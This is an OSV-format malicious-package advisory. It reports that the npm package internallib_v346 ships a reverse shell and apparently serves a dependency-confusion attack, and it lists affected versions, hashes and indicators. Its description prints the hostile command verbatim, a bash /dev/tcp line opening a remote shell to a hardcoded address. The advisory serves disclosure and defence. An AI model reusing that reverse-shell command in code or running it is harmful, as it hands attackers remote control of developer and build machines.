{"id":"MAL-2026-5613","summary":"Malicious code in internallib_v346 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (16f3f2c0990e02417fdf7012e6531393e81f786bb16019d0efdb03c049817f90)\nPackage name targets an internal-only namespace and ships a reverse-shell payload. index.js line 5 unconditionally invokes `exec('/bin/bash -c \"bash -i \u003e& /dev/tcp/10.0.56.229/443 0\u003e&1\"')` inside the first definition of the exported `command` function, opening an interactive shell back to the hardcoded RFC1918 address 10.0.56.229 on port 443. A second assignment to `exports.command` later in the file overwrites the export, but the malicious statement is evaluated whenever the first function body is reached and is shipped verbatim in the published tarball. The package also declares a self-referential dependency on `internallib_v346: ^1.0.0` and includes a.gitlab-ci.yml that runs `npm update --registry http://0.0.0.0:4873/` followed by `node check.js`, where check.js does `require(\"internallib_v346\")`. The naming and CI shape are characteristic of a Birsan-style dependency-confusion attack against an organization's internal `internallib_v346` package: when a victim build resolves from the public registry instead of the internal Verdaccio mirror, the reverse-shell code lands in the developer or CI environment.\n","modified":"2026-06-12T16:46:41.774865817Z","published":"2026-06-11T07:19:48Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-005696","modified_time":"2026-06-11T07:19:48Z","versions":["1.0.3"],"sha256":"16f3f2c0990e02417fdf7012e6531393e81f786bb16019d0efdb03c049817f90","source":"amazon-inspector","import_time":"2026-06-11T07:49:42.089279362Z"},{"id":"IN-MAL-2026-005698","sha256":"ca0c0f264625c77a0695bd5e908a1e7f764bcaaa16d3e785167b0ab56965fdd4","versions":["1.1.0"],"modified_time":"2026-06-11T07:19:50Z","source":"amazon-inspector","import_time":"2026-06-11T07:49:42.274607487Z"},{"id":"IN-MAL-2026-005697","modified_time":"2026-06-11T07:19:49Z","versions":["1.0.9"],"sha256":"a9cd3a304ca53f98e5e1598be0822c44c12d54d41e2ca72ae6d39c12a7332e14","source":"amazon-inspector","import_time":"2026-06-11T07:49:42.171801317Z"},{"id":"IN-MAL-2026-005699","modified_time":"2026-06-11T07:19:52Z","versions":["1.0.5"],"sha256":"b63d776e7932e5f411c572799269f05aaec305e2df00a9e6a635f50c60f49a25","source":"amazon-inspector","import_time":"2026-06-11T07:49:42.389563885Z"},{"id":"IN-MAL-2026-005789","sha256":"b8244df25b60c5471ac12cc27ca7116899c12e3741c5a3477c8e1bf65b0c4434","versions":["1.1.1"],"modified_time":"2026-06-12T15:28:22Z","source":"amazon-inspector","import_time":"2026-06-12T16:32:16.54285143Z"},{"id":"IN-MAL-2026-005790","import_time":"2026-06-12T16:32:16.577539407Z","versions":["1.1.2"],"sha256":"00d56227ad7f3e5b9b0b9f8e04ce88fec70ed7e96a438a1c39f33ad86d203055","source":"amazon-inspector","modified_time":"2026-06-12T15:28:23Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v346/v/1.0.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v346/v/1.1.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v346/v/1.0.9"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v346/v/1.0.5"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v346/v/1.1.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v346/v/1.1.2"}],"affected":[{"package":{"name":"internallib_v346","ecosystem":"npm","purl":"pkg:npm/internallib_v346"},"versions":["1.0.3","1.1.0","1.0.9","1.0.5","1.1.1","1.1.2"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v346/MAL-2026-5613.json","cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"tlsh":"54e0205a19fe1930a51570e06a0bf050794b59662224c161e46495a35f8100d51aa4ed","path":"index.js","sha256":"2e6d10be6c0aae2e7ac2ef2b8d2689e66cef888121d3ce018962d5cab7b2e3cb"},{"tlsh":"9cd02e200a225c3322c5036a2c79801372a09f2f008afc0863cb492c40cf2b39cfd30c","path":"package.json","sha256":"189a24406d5f4df85449f0abdb9965c181115162261711283ed1e21a8f9d3246"}],"package_integrity":[{"hashes":{"sha1":"aca560455bddec62ffe7b1f4ee7478d4ab614f47","sha512_sri":"sha512-UlnT7WsGHbNi8md2n7eCjVH/QYDw7HwM7x9Mgey5uZRwbVWxZRNQkdaSMoz7NO+0Re3W3ozqCULKtuAKNnAlew=="},"filename":"internallib_v346-1.0.3.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}